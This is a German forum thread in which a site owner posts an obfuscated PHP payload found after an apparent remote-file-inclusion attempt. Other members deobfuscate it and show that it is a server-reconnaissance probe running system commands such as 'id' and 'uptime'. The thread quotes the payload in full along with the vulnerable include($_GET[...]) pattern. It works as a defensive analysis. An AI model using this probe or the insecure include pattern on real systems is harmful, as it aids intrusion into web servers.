#1 28. November 2009 Hi ich hab vorhin in der Log von meinem Webspace was interessantes gesehen: Könnte das ein versuchter Angriff mit XSS sein? Funktionieren tut das nich, weil ich Teile der Seite nicht mit <?php include($_GET['dsp']); ?> einbinde, würde mich aber interessieren obs wirklich eine attacke wahr... in der cmdstate.txt, die offensichtlich eingebunden werden sollte, steht das hier drin: Spoiler Code: <?php $x1c="\x64\151\163k\146\162\145e\x73\160\x61\x63\x65"; $x1d="\144i\163\x6b_\164o\164a\154\137\x73\160\x61ce"; $x1e="\x67\145\x74\x63\x77d"; $x1f="\x67e\164\x65\x6e\166"; $x20="\x67\145t\150\157s\x74by\156\x61\155\145"; $x21="\x70\150\x70\x5fu\x6e\141\155e"; $x22="\x70\x68\x70\166e\162\163\x69\157n"; $x23="\163\x70r\x69\x6et\x66"; $x24="\163tr\154e\x6e"; $x25="\x73y\163\164\x65\155"; function ConvertBytes($x0b){ global $x1c,$x1d,$x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25; $x0c = $x24($x0b); if($x0c < 4){return $x23("\045d\040\142", $x0b);} if($x0c >= 4 && $x0c <=6){return $x23("\045\x30.\x32f\040K\142", $x0b/1024);} if($x0c >= 7 && $x0c <=9) {return $x23("%\x30\056\x32\x66 \115b", $x0b/1024/1024);} return $x23("%0\x2e\062\146 Gb", $x0b/1024/1024/1024); } echo "\x66\151\147\x62a\x79\x69\154\157\146i\x6cogba<\x62r\076"; $x0d = @$x21(); $x0e = $x25(uptime); $x0f = $x25(id); $x10 = @$x1e(); $x11 = $x1f("\x53\x45\122\x56\x45\122\x5f\x53O\106\124\x57A\122\105"); $x12 = $x22(); $x13 = $_SERVER['SERVER_NAME']; $x14 = $x20($x15); $x16= $x1c($x10);$x17 = ConvertBytes($x1c($x10)); if (!$x17) {$x17 = 0;} $x18= $x1d($x10); $x19 = ConvertBytes($x1d($x10)); if (!$x19) {$x19 = 0;} $x1a = ConvertBytes($x18-$x16); $x1b = @PHP_OS; echo "\146\x69\x67\142\x61y\x69\x6co\146i\x6c\x6fg\x62\x61\074\142\162\076"; echo "\165n\141\x6d\145 -\141: $x0d<\x62\162\x3e"; echo "os\072 $x1b\x3c\x62\162\x3e"; echo "\165\x70\164i\155\x65\072 $x0e<\x62\x72\076"; echo "\x69d\072 $x0f<\142\x72>"; echo "\160w\x64\x3a $x10<\x62r>";echo "p\150p\x3a\040$x12\x3c\x62\162>"; echo "\163\x6f\x66\x74\167a\162\x65:\x20$x11\x3c\x62\162>"; echo "\x73\x65r\x76\x65r\x2d\x6e\141\155\145\x3a\x20$x13\074\142\162\076"; echo "s\145\x72ver\x2d\x69p\072 $x14\x3c\x62\162\x3e";echo "f\162\145\145:\040$x17<br\x3e"; echo "u\163\145d\072\040$x1a\074b\x72>"; echo "to\164\141\x6c:\x20$x19<\142\x72>"; exit; ?> kennt sich da einer näher mit aus?^^ mfg Fuselmeister + Multi-Zitat Zitieren
#2 28. November 2009 AW: Opfer von XSS angriff? Das war keine xss sondern eine rfi. (remote file inclusion) sinn einer rfi ist code in den webserver einzuschleusen und auszuführen. (zb eine php shell oder schadcode) dies gelingt aber natürlich nur wenn die aufgerufene php ne lücke hat und du ungünstige php settings hast. + Multi-Zitat Zitieren
#3 28. November 2009 AW: Opfer von XSS angriff? Mich würde mal interessieren, was der Code macht.... Kann das jemand "entschlüsseln"? so long pampers + Multi-Zitat Zitieren
#4 28. November 2009 AW: Opfer von XSS angriff? Code: figbayilofilogba figbayilofilogba uname -a: Windows NT *_NAME DES BENUTZERS_* 5.1 build 2600 os: WINNT uptime: id: pwd: C:\xampp\htdocs php: 5.2.8 software: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.8 server-name: localhost server-ip: 192.168.0.3 free: 26.74 Gb used: 139.27 Gb total: 166.02 Gb Kommt dabei raus. Ist natürlich über Xampp ausgeführt worden. + Multi-Zitat Zitieren
#5 28. November 2009 AW: Opfer von XSS angriff? Das Script ist nur dazu da, um einen möglichen Angriff auf deinen Server zu starten. Dabei sammelt das Script verschiedene Informationen über deinen Server, wie z.B. die komplette Ausgabe von uname, Serverkonfigurationsdatei, um was für einen Server es sich handelt, etc. Der Hexadezimalcode wird dabei nur verwendet, um das komplette Script unleserlich zu machen... + Multi-Zitat Zitieren
#6 28. November 2009 AW: Opfer von XSS angriff? PHP: <? php function ConvertBytes ( $x0b ){ [...] Berechnet Speicherplatz etc . } echo "figbayilofilogba<br>" ; echo "figbayilofilogba<br>" ; echo "uname -a: @php_uname()<br>" ; echo "os: @PHP_OS<br>" ; echo "uptime: system(uptime)<br>" ; echo "id: system(id)<br>" ; echo "pwd: @getcwd()<br>" ; echo "php: phpversion()<br>" ; echo "software: getenv('SERVER_SOFTWARE')<br>" ; echo "server-name: $_SERVER [ 'SERVER_NAME']<br>" ; echo "server-ip: gethostbyname( $x15 )<br>" ; echo "free: ConvertBytes( $x1c ( $x10 ))" echo "used: ConvertBytes( $x18 - $x16 )<br>" ; echo "total: $x19 (Ergibt sich aus Funktion ConvertBytes( $x1d ( $x10 )))<br>" ; exit; ?> Hätte editiert, aber da der Beitrag noch nicht freigeschaltet wurde, "musste" ich es nun so machen. Skript liest nur Sachen aus und parst danach wahrscheinlich nen paar Sachen um Lücken zu finden. Sollte bei einer normalen Konfiguration aber nicht wirklich funktionieren. + Multi-Zitat Zitieren
#7 28. November 2009 AW: Opfer von XSS angriff? das script würde alle möglichen system-infos ausgeben PHP: function ConvertBytes ( $x0b ) { $x0c = strlen ( $x0b );if( $x0c < 4 ){return sprintf ( "%d" , $x0b );} if( $x0c >= 4 && $x0c <= 6 ){return sprintf ( "%0.2f Kb" , $x0b / 1024 );} if( $x0c >= 7 && $x0c <= 9 ){return sprintf ( "%0.2f Mb" , $x0b / 1024 / 1024 );} return sprintf ( "%0.2f Gb" , $x0b / 1024 / 1024 / 1024 ); } $x0d = @ php_uname (); $x0e = system ( uptime ); $x0f = system ( id ); $x10 = @ getcwd (); $x11 = getenv ( "SERVER_SOFTWARE" ); $x12 = phpversion (); $x13 = $_SERVER [ 'SERVER_NAME' ]; $x14 = gethostbyname ( $x15 ); $x16 = diskfreespace ( $x10 ); $x17 = ConvertBytes ( diskfreespace ( $x10 ));if (! $x17 ) { $x17 = 0 ;} $x18 = disk_total_space ( $x10 ); $x19 = ConvertBytes ( $x1d ( $x10 ));if (! $x19 ) { $x19 = 0 ;} $x1a = ConvertBytes ( $x18 - $x16 ); $x1b = @ PHP_OS ;echo "figbayilofilogba" ;echo "uname -a: $x0d <br>" ;echo "os: $x1b <br>" ;echo "uptime: $x0e <br>" ;echo "id: $x0f <br>" ;echo "pwd: $x10 <br>" ;echo "php: $x12 <br>" ;echo "software: $x11 <br>" ;echo "server-name: $x13 <br>" ;echo "server-ip: $x14 <br>" ;echo "free: $x17 <br>" ;echo "used: $x1a <br>" ;echo "total: $x19 <br>" ;exit; Code: uname -a: Windows NT xxx 6.1 build 7600 ((null)) i586 os: WINNT uptime: id: pwd: D:\Programme\xampplite\htdocs\ php: 5.3.0 software: Apache/2.2.12 (Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k mod_autoindex_color PHP/5.3.0 server-name: localhost server-ip: 192.168.2.100 free: 176.64 Gb used: 423.95 Gb total: 600.59 Gb + Multi-Zitat Zitieren
#8 29. November 2009 AW: Opfer von XSS angriff? THX für die Infos... BWs sind raus, soweit es ging ich werd mal die Log auf Aktivitäten von 212.159.7.145 im Auge behalten... mfg + Multi-Zitat Zitieren